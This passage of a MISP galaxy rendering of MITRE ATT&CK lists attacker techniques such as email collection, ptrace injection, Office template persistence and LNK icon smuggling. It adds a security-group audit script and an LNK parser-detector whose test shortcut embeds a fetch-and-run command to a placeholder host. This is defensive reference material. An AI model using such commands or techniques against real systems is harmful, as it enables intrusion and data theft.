Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)

The tag is: misp-galaxy:mitre-attack-pattern="Network Device CLI - T1059.008"

Table 5693. Table References

Links

https://attack.mitre.org/techniques/T1059/008

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://tools.cisco.com/security/center/resources/integrity_assurance.html#23

Local Email Collection - T1114.001

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in C:\Users\<username>\Documents\Outlook Files or C:\Users\<username>\AppData\Local\Microsoft\Outlook.(Citation: Microsoft Outlook Files)

The tag is: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001"

Table 5694. Table References

Links

https://attack.mitre.org/techniques/T1114/001

https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/

https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790

Remote Email Collection - T1114.002

Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user’s credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.

The tag is: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002"

Table 5695. Table References

Links

https://attack.mitre.org/techniques/T1114/002

Compiled HTML File - T1218.001

Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX.(Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser(Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe).(Citation: Microsoft HTML Help Executable Program)

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe.(Citation: MsitPros CHM Aug 2017)(Citation: Microsoft CVE-2017-8625 Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001"

Table 5696. Table References

Links

https://attack.mitre.org/techniques/T1218/001

https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk

https://msdn.microsoft.com/windows/desktop/ms524405

https://msdn.microsoft.com/windows/desktop/ms644670

https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625

Email Forwarding Rule - T1114.003

Adversaries may set up email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to a victim’s emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)

In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then perform a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.

The tag is: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003"

Table 5697. Table References

Links

https://attack.mitre.org/techniques/T1114/003

https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/

https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/

https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules

https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac

https://www.us-cert.gov/ncas/alerts/TA18-086A

Ptrace System Calls - T1631.001

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.

Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (e.g., by using malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target process’s memory (e.g., the current address of the next instruction).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018)

Ptrace system call injection may not be possible when targeting processes with high privileges, and on some systems those that are non-child processes.(Citation: BH Linux Inject)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Ptrace System Calls - T1631.001"

Table 5698. Table References

Links

http://man7.org/linux/man-pages/man2/ptrace.2.html

https://attack.mitre.org/techniques/T1631/001

https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf

https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be

Office Template Macros - T1137.001

Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)

Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019)

Word Normal.dotm location: <code>C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>

Excel Personal.xlsb location: <code>C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>

Adversaries may also change the location of the base template to point to their own by hijacking the application’s search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019)

An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.

The tag is: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001"

Table 5699. Table References

Links

http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/

https://attack.mitre.org/techniques/T1137/001

https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/

https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746

https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943

https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office

https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea

https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique

System Language Discovery - T1614.001

Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)

There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019)

For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language</code> or parsing the outputs of Windows API functions <code>GetUserDefaultUILanguage</code>, <code>GetSystemDefaultUILanguage</code>, <code>GetKeyboardLayoutList</code> and <code>GetUserDefaultLangID</code>.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)

On a macOS or Linux system, adversaries may query <code>locale</code> to retrieve the value of the <code>$LANG</code> environment variable.

The tag is: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001"

Table 5700. Table References

Links

https://attack.mitre.org/techniques/T1614/001

https://securelist.com/evolution-of-jsworm-ransomware/102428/

https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware

https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/

Transmitted Data Manipulation - T1641.001

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.

One method to achieve [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the ClipboardManager.OnPrimaryClipChangedListener interface on Android to determine when clipboard contents have changed. Listening to clipboard activity, reading clipboard contents, and modifying clipboard contents requires no explicit application permissions and can be performed by applications running in the background. However, this behavior has changed with the release of Android 10.

Adversaries may use [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) to replace text prior to it being pasted, for example by replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.

[Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) was seen within the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1641.001"

Table 5701. Table References

Links

https://attack.mitre.org/techniques/T1641/001

https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/

Dead Drop Resolver - T1481.001

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1481.001"

Table 5702. Table References

Links

https://attack.mitre.org/techniques/T1481/001

Security Software Discovery - T1418.001

Adversaries may attempt to get a listing of security applications and configurations that are installed on a device. This may include things such as mobile security products. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions.

The tag is: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1418.001"

Table 5703. Table References

Links

https://attack.mitre.org/techniques/T1418/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html

Disk Content Wipe - T1561.001

Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001"

Table 5704. Table References

Links

https://attack.mitre.org/techniques/T1561/001

https://docs.microsoft.com/sysinternals/downloads/sysmon

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

https://www.justice.gov/opa/press-release/file/1092091/download

Security Software Discovery - T1518.001

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the <code>DescribeSecurityGroups</code> action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud)
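The cloud side of this discovery step is the same call a defender makes when auditing exposure. The following added example (not part of the ATT&CK or MISP text) walks a <code>DescribeSecurityGroups</code> response and lists inbound rules reachable from any address, marking the management and database ports they expose. The response below is constructed for the example; the group IDs, names and the <code>MANAGEMENT_PORTS</code> table are this example's own assumptions, but the dictionary shape is the one the EC2 API returns.

```python
# Added example: audit a DescribeSecurityGroups response for world-reachable inbound rules.
# SAMPLE_RESPONSE is constructed; group IDs/names are made up for this example.
MANAGEMENT_PORTS = {22: "ssh", 445: "smb", 1433: "mssql", 3306: "mysql",
                    3389: "rdp", 5432: "postgres", 5985: "winrm", 5986: "winrm-https"}
ANY_V4, ANY_V6 = "0.0.0.0/0", "::/0"


def describe_ports(rule):
    """Human-readable port range of one IpPermissions entry."""
    proto = rule.get("IpProtocol")
    if proto == "-1":                       # -1 means every protocol; FromPort/ToPort are absent
        return "all"
    lo, hi = rule.get("FromPort"), rule.get("ToPort")
    if lo is None:
        return f"{proto}/any"
    return f"{proto}/{lo}" if lo == hi else f"{proto}/{lo}-{hi}"


def exposed_inbound(response):
    """List inbound rules whose source is 0.0.0.0/0 or ::/0, annotated with the
    management/database ports (from MANAGEMENT_PORTS) that fall inside the rule."""
    findings = []
    for group in response.get("SecurityGroups", []):
        for rule in group.get("IpPermissions", []):
            sources = [r["CidrIp"] for r in rule.get("IpRanges", []) if r.get("CidrIp") == ANY_V4]
            sources += [r["CidrIpv6"] for r in rule.get("Ipv6Ranges", []) if r.get("CidrIpv6") == ANY_V6]
            if not sources:
                continue                    # only specific CIDRs, prefix lists or other groups
            lo, hi = rule.get("FromPort"), rule.get("ToPort")
            if rule.get("IpProtocol") == "-1" or lo is None:
                sensitive = sorted(MANAGEMENT_PORTS.values())   # everything is open
            else:
                sensitive = sorted(name for port, name in MANAGEMENT_PORTS.items() if lo <= port <= hi)
            findings.append({"group": group["GroupId"], "name": group.get("GroupName"),
                             "ports": describe_ports(rule), "sources": sources,
                             "sensitive": sensitive})
    return findings


# Constructed response in the shape returned by ec2:DescribeSecurityGroups.
SAMPLE_RESPONSE = {"SecurityGroups": [
    {"GroupId": "sg-0a1b2c3d4e5f60001", "GroupName": "web", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
    ]},
    {"GroupId": "sg-0a1b2c3d4e5f60002", "GroupName": "db", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 5432, "ToPort": 5432,
         "UserIdGroupPairs": [{"GroupId": "sg-0a1b2c3d4e5f60001"}]},
    ]},
    {"GroupId": "sg-0a1b2c3d4e5f60003", "GroupName": "legacy-mgmt", "IpPermissions": [
        {"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
    ]},
]}

if __name__ == "__main__":
    for f in exposed_inbound(SAMPLE_RESPONSE):
        print(f"{f['group']} ({f['name']}): {f['ports']} from {', '.join(f['sources'])}"
              + (f"  exposes {', '.join(f['sensitive'])}" if f["sensitive"] else ""))
```

Against a live account the same function can be fed the pages returned by <code>boto3.client("ec2").get_paginator("describe_security_groups")</code>; the rule entries are identical. Rules whose only sources are other security groups (the <code>db</code> group above) are skipped, which is also why an adversary running this call learns not just what is open but which group-to-group paths exist.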

The tag is: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001"

Table 5705. Table References

Links

https://attack.mitre.org/techniques/T1518/001

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html

https://expel.io/blog/finding-evil-in-aws/

Determine Physical Locations - T1591.001

Adversaries may gather the victim’s physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).

The tag is: misp-galaxy:mitre-attack-pattern="Determine Physical Locations - T1591.001"

Table 5706. Table References

Links

https://attack.mitre.org/techniques/T1591/001

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

https://www.sec.gov/edgar/search-and-access

LNK Icon Smuggling - T1027.012

Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the IconEnvironmentDataBlock) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory.

Adversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)/[System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218) arguments within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)

LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads.
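Because the icon reference lives in ordinary shortcut metadata, a content filter has to parse the file to see it. The following added example (written for this page, not taken from ATT&CK, MISP or the cited posts) builds a minimal <code>.LNK</code> from the MS-SHLLINK layout, then parses the StringData icon location and the IconEnvironmentDataBlock back out and flags references that leave the host. The shortcut contents and the <code>files.example.invalid</code> hostnames are constructed for the example.

```python
import re
import struct

# Added example: build a minimal Shell Link and parse its icon references back out.
# Constants are from the MS-SHLLINK layout; the shortcut built below is constructed.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000C000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
ICON_ENV_SIGNATURE = 0xA0000007        # IconEnvironmentDataBlock
ICON_ENV_BLOCK_SIZE = 0x314            # 8-byte block header + 260 ANSI + 520 Unicode bytes


def build_lnk(arguments, icon_location, icon_env_target=None):
    """Header + StringData (arguments, icon location) + optional IconEnvironmentDataBlock.
    No LinkTargetIDList or LinkInfo is written, so the parser's skip logic for them is exercised
    only by real-world files."""
    flags = HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<I", flags)
    header += bytes(HEADER_SIZE - len(header))      # attributes, timestamps, icon index etc. left zero

    def string_data(text):                          # CountCharacters (u16) + UTF-16LE chars, no terminator
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(arguments) + string_data(icon_location)
    extra = b""
    if icon_env_target is not None:
        extra = struct.pack("<II", ICON_ENV_BLOCK_SIZE, ICON_ENV_SIGNATURE)
        extra += icon_env_target.encode("ascii").ljust(260, b"\0")
        extra += icon_env_target.encode("utf-16-le").ljust(520, b"\0")
    return header + body + extra + b"\0\0\0\0"       # TerminalBlock


def parse_lnk(data):
    """Return the StringData fields and the IconEnvironmentDataBlock target, if present."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:              # IDListSize (u16) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                       # LinkInfoSize (u32) covers the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            nbytes = count * 2 if unicode else count
            fields[name] = data[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252")
            off += nbytes
    while off + 4 <= len(data):                     # ExtraData blocks end at a block with size < 4
        block_size = struct.unpack_from("<I", data, off)[0]
        if block_size < 4:
            break
        if struct.unpack_from("<I", data, off + 4)[0] == ICON_ENV_SIGNATURE:
            target = data[off + 8 + 260: off + 8 + 260 + 520]
            fields["icon_env_target"] = target.decode("utf-16-le").split("\0", 1)[0]
        off += block_size
    return fields


REMOTE_PATH = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)   # URL or UNC path


def assess(fields):
    """Flag icon references that resolve off-host and arguments that carry a URL."""
    findings = []
    for key in ("icon_location", "icon_env_target"):
        value = fields.get(key, "")
        if REMOTE_PATH.match(value):
            findings.append(f"{key} resolves off-host: {value}")
    if re.search(r"https?://", fields.get("arguments", ""), re.IGNORECASE):
        findings.append("arguments reference a URL: " + fields["arguments"])
    return findings


if __name__ == "__main__":
    sample = build_lnk('/c start "" http://files.example.invalid/stage.hta',
                       "http://files.example.invalid/icon.ico",
                       "\\\\files.example.invalid\\share\\icon.ico")
    for finding in assess(parse_lnk(sample)):
        print(finding)
```

A UNC icon path is worth flagging on its own: Explorer resolves it when it renders the directory listing, before the user clicks anything, so an SMB connection (and an NTLM exchange) can leave the host with no execution at all.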

The tag is: misp-galaxy:mitre-attack-pattern="LNK Icon Smuggling - T1027.012"

Table 5707. Table References

Links

https://attack.mitre.org/techniques/T1027/012

https://unprotect.it/technique/shortcut-hiding/

https://www.uperesia.com/booby-trapped-shortcut

GUI Input Capture - T1417.002

Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)

There are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.(Citation: eset-finance) Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.(Citation: Group IB Gustuff Mar 2019)

Additionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. Adversaries can abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches to displaying a prompt include:

  • Adversaries start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)

  • Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the SYSTEM_ALERT_WINDOW permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The SYSTEM_ALERT_WINDOW permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)

The tag is: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1417.002"

Table 5708. Table References

Links

http://cloak-and-dagger.org/

http://w2spconf.com/2011/papers/felt-mobilephishing.pdf

https://attack.mitre.org/techniques/T1417/002

https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf

https://developer.android.com/guide/components/activities/background-starts

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

https://www.group-ib.com/blog/gustuff

https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/

https://www.skycure.com/blog/accessibility-clickjacking/

https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/

https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/

Credentials In Files - T1552.001

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)

